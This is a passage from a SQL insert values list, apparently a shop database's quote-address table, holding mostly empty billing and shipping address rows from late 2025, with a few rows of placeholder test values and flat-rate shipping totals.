(611, 487, '2025-11-14 16:51:51', '2025-11-14 16:51:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(612, 487, '2025-11-14 16:51:51', '2025-11-14 16:51:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(613, 488, '2025-11-14 16:52:04', '2025-11-14 16:52:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(614, 488, '2025-11-14 16:52:04', '2025-11-14 16:52:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(615, 489, '2025-11-14 16:52:19', '2025-11-14 16:52:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(616, 489, '2025-11-14 16:52:19', '2025-11-14 16:52:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(617, 490, '2025-11-14 16:52:29', '2025-11-14 16:52:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(618, 490, '2025-11-14 16:52:29', '2025-11-14 16:52:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(619, 491, '2025-11-18 22:46:11', '2025-11-18 22:46:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(620, 491, '2025-11-18 22:46:11', '2025-11-18 22:46:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(621, 492, '2025-12-01 00:45:09', '2025-12-01 00:45:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(622, 492, '2025-12-01 00:45:09', '2025-12-01 00:45:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(623, 493, '2025-12-01 03:21:38', '2025-12-01 03:21:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(624, 493, '2025-12-01 03:21:38', '2025-12-01 03:21:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(625, 494, '2025-12-02 17:01:59', '2025-12-02 17:01:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(626, 494, '2025-12-02 17:01:59', '2025-12-02 17:01:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(627, 495, '2025-12-06 17:26:39', '2025-12-06 17:26:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(628, 495, '2025-12-06 17:26:39', '2025-12-06 17:26:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(629, 496, '2025-12-06 17:26:47', '2025-12-06 17:26:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(630, 496, '2025-12-06 17:26:47', '2025-12-06 17:26:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(631, 497, '2025-12-06 17:26:53', '2025-12-06 17:26:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(632, 497, '2025-12-06 17:26:53', '2025-12-06 17:26:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(633, 498, '2025-12-06 17:26:59', '2025-12-06 17:26:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(634, 498, '2025-12-06 17:26:59', '2025-12-06 17:26:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(635, 499, '2025-12-06 22:18:05', '2025-12-06 22:18:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(636, 499, '2025-12-06 22:18:05', '2025-12-06 22:18:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(637, 500, '2025-12-06 22:18:42', '2025-12-06 22:18:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(638, 500, '2025-12-06 22:18:42', '2025-12-06 22:18:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(639, 501, '2025-12-06 22:19:19', '2025-12-06 22:19:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(640, 501, '2025-12-06 22:19:19', '2025-12-06 22:19:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(641, 502, '2025-12-06 22:19:55', '2025-12-06 22:19:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(642, 502, '2025-12-06 22:19:55', '2025-12-06 22:19:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(643, 503, '2025-12-12 15:02:44', '2025-12-12 15:02:44', NULL, 0, NULL, 'billing', NULL, NULL, 'jljlj', NULL, 'ljlkjlk', NULL, NULL, 'ljlkj ds88', 'lkjlk', 'wdw', NULL, '1234', 'BD', '89798798798', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(644, 503, '2025-12-12 15:02:44', '2025-12-12 15:03:41', NULL, 0, NULL, 'shipping', NULL, NULL, 'jljlj', NULL, 'ljlkjlk', NULL, NULL, 'ljlkj ds88', 'lkjlk', 'wdw', NULL, '1234', 'BD', '89798798798', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 59.0000, 59.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(645, 504, '2025-12-15 20:18:15', '2025-12-15 20:18:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(646, 504, '2025-12-15 20:18:15', '2025-12-15 20:18:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(647, 505, '2025-12-15 20:18:16', '2025-12-15 20:18:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(648, 505, '2025-12-15 20:18:16', '2025-12-15 20:18:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(649, 506, '2025-12-15 20:42:50', '2025-12-15 20:42:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(650, 506, '2025-12-15 20:42:50', '2025-12-15 20:42:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(651, 507, '2025-12-15 20:42:51', '2025-12-15 20:42:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(652, 507, '2025-12-15 20:42:51', '2025-12-15 20:42:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(653, 508, '2025-12-15 23:29:58', '2025-12-15 23:29:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(654, 508, '2025-12-15 23:29:58', '2025-12-15 23:29:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(655, 509, '2025-12-17 08:18:08', '2025-12-17 08:18:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(656, 509, '2025-12-17 08:18:08', '2025-12-17 08:18:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
